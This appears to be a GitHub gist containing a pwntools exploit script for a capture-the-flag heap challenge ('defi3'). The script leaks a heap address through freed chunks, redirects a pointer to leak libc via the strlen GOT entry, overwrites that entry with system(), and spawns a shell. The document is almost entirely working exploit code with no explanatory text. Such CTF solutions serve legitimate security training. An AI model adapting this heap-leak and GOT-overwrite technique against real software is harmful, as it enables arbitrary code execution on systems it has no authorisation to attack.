Last active
June 18, 2019 19:12
-
-
Save 0xPwny/ad9cafed0d68bf90ca89c48071381b25 to your computer and use it in GitHub Desktop.
DGSE challenge defi3 - heap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
r = process("./defi3") | |
def allocate(nom,idx): | |
r.sendline("1") | |
r.sendline(nom) | |
r.sendline(idx) | |
def show(): | |
r.recv() | |
r.sendline("2") | |
data= r.recvuntil("faire ?") | |
return data | |
def free(idx,tofree): | |
r.sendline("3") | |
r.sendline(idx) | |
r.sendline(tofree) | |
def edit(nmorid,idx,data): | |
if nmorid=="nom": | |
r.sendline("4") | |
elif nmorid=="id": | |
r.sendline("5") | |
r.sendline(idx) | |
r.sendline(data) | |
print "[+] CHUNCKS CREATED " | |
allocate("AAAAAAAA","BBBBBBBB") | |
allocate("CCCCCCCC","DDDDDDDD") | |
allocate("EEEEEEEE"*6,"FFFFFFFF"*6) | |
r.recv() | |
pause() | |
print "[+] CHUNK FREEd" | |
free("1","2") | |
free("0","2") | |
print "[+] HEAP LEAK .. DONE" | |
heapleak = show() | |
HEAP = u32(heapleak.strip().split(": ")[1].split("\n")[0]) | |
HEAP_BASE = HEAP - 0x15c0 | |
print "[+] HEAP LEAK : ",hex(HEAP) | |
print "[+] HEAP BASE : ",hex(HEAP_BASE) | |
edit("nom","0",p32(HEAP_BASE+0x1520)) | |
allocate("\x30\x20\x60","RRRRRRRR") #overwrite pointer to strlen GOT | |
r.recv() | |
libcleak = show() | |
LIBC_strlen =u64(libcleak.strip().split(": ")[1].split("\n")[0].ljust(8,"\x00")) | |
LIBC_base = LIBC_strlen - 0x8b720 | |
LIBC_system= LIBC_base + 0x45390 | |
print "[+] LIBC LEAK : ",hex(LIBC_strlen) | |
print "[+] LIBC BASE : ",hex(LIBC_base) | |
pld =p64(LIBC_system)[:-3]+"\x7f" | |
edit("nom","0",pld) # overwrite strlen GOT to system() | |
r.sendline("sh") | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment